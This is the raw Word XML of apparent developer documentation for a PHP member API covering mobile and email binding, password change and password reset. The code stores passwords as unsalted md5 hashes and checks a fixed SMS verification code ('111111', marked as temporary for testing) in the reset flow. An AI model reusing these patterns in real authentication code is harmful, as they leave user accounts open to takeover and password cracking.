    <w:p w14:paraId="010D70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str_replace('\\', '/', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAECD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g'] = $img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C167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update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F77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21CD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img,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26921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413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9B3E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0BAA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file-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63197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263B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7C83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3CB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9AD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769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mobile </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员手机号码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5F4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修改会员手机号码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA857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1E2532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1420EA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4DD0E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mobile   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机号码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638FC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de     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机验证码（必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> text: </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68E2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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D0C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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDC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9A29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bile()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939C4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296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861C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B3C1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7B0B62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EC8F5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8F80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363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input('param.mobile', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AFCE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799FA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91BA2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请填写绑定手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64384B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EAD8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F05D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4F44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_isMobile($mobile)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E123D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BC5F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格式错误，请填写正确手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C4A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3E48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1DC0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730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mobile'] &amp;&amp; $this-&gt;member['mobile'] == $mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675755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C862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绑定了该手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6294C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7FA1A5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592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4C4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param.code', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7968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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBBF4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8A03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填写手机验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529EA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542438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9143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E8E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mobile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70162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1CD0A7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BA6F1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data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A55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562CA2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536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D440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mobile', $mobile)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B217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504E3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4E57E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手机号码已被其他用户绑定，请重新换手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EC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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA939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00A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4D9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mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC3C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8720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绑定过该手机号码，如需要解绑请联系客服</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091C1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16AA1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8F1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96E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47744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his-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B1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Field('mobile', $mobile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FAB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DE39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this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102999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修改手机号码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FEA0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15948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294D8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修改手机号码失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D387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A5243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052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0E18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ACEF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EAB1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email()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DF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A69B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input('param.username') ? input('param.username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3E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name) return ['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请填写绑定手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129343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_isEmail($username)) return ['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱格式错误，请填写正确邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3688BE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param.code') ? input('param.code') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0E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return ['err' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请填写邮箱验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525298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username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3A5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7DB9DA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E0F1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data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B77D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0E5C2A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DF67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813C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email', $username)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0977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7845E6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AF4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邮箱已被其他用户绑定，请重新换邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01D4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5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D1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028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4BB8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email']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E66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6D93F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绑定过邮箱，如需要解绑请联系客服</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77715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53447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97F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6188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gt;where('id', $this-&gt;memberId)-&gt;setField('email', $username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B558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D157C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this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C65FC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FA1A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绑定邮箱成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809A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B8A6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7C772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97BC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绑定邮箱失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B917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7E06E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EAE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3B9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BA95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3B7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080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password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FE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修改会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38175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730EA2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Version 0.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136CA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49EF5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old_password   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户原密码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA73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new_password   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户新密码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359B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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E5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oken  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFD82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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217581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FBC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ssword()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC6FD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EC53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463B5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D5A0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313DC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2A678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C6BB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0A8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ld_password = input('param.old_password', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEEC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ew_password = input('param.new_password', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE6A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old_password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F6B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E417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原密码不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBAB5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8E05D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6AB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F43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d5($old_password) != $this-&gt;member['password']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB9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7AD4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原密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E113B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4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762517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FC22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BD57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new_password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D51C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AC0EC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新密码不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16501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897F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6BC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6CCD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d5($old_password) == md5($new_password)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27126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76760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原密码和新密码不允许相同</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F19C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5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07187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10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616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d5($new_password) == $this-&gt;member['password']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4942FB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9B627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原密码和新密码不允许相同</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D8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5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB5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4CB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3DC8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A511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this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748FA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Field('password', md5($new_password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735E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oken = _encrypt($this-&gt;memberId . '|www.ffxiang.cn|' . md5($new_password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79959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BE6AF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this-&gt;memberId, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF38F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29C609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密码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5BD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gt; $token,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37343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492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3E61F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7E4CC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修改密码失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F074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DB3E3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22A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A1AB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5445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81C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07F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reset_password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重置会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FFE1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重置会员密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0484E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7A1F6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222C5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mobile    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机号（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198EC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password  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户密码（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF3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de      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信验证码（必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>暂时测试用：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>111111</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079375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重置密码成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1637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token   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52593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重置密码失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E00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FE26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set_password()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48061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92D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191826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E99C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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB8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9CF82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CC4F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1CF1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input('param.mobile', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7589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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30DA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32B8F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填写绑定手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592FF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20438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C71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9FA1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_isMobile($mobile)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F52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4631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格式错误，请填写正确手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7A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07472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665B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C87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input('param.password', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716F2F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51801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2F1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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请填写用户密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179478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5EC7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E583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FD8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de = input('param.code', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E4A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F4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A714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填写手机验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD6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5237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06A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CB54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de != '111111') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B3B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BB2C7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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748DD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0063A4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98D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DE6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_codechecking($code, $mobile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B565D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 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B479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53F9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data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C95A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6B958D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69D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73E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where('mobile', $mobile)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133655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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B99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8E86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手机号码没有对应的绑定用户，请重新换手机号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D43D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6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E92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8223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92E9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password'] == md5($password)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508F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31E7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重置密码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12864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gt; _encrypt($member['id'] . '|www.ffxiang.cn|' . $member['password']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B7E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5F5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78FC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8AB8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ember['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C79D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tField('password', md5($password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F75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_encrypt($member['id'] . '|www.ffxiang.cn|' . md5($password));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F1C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5A492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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重置密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F3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4774AA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重置密码成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
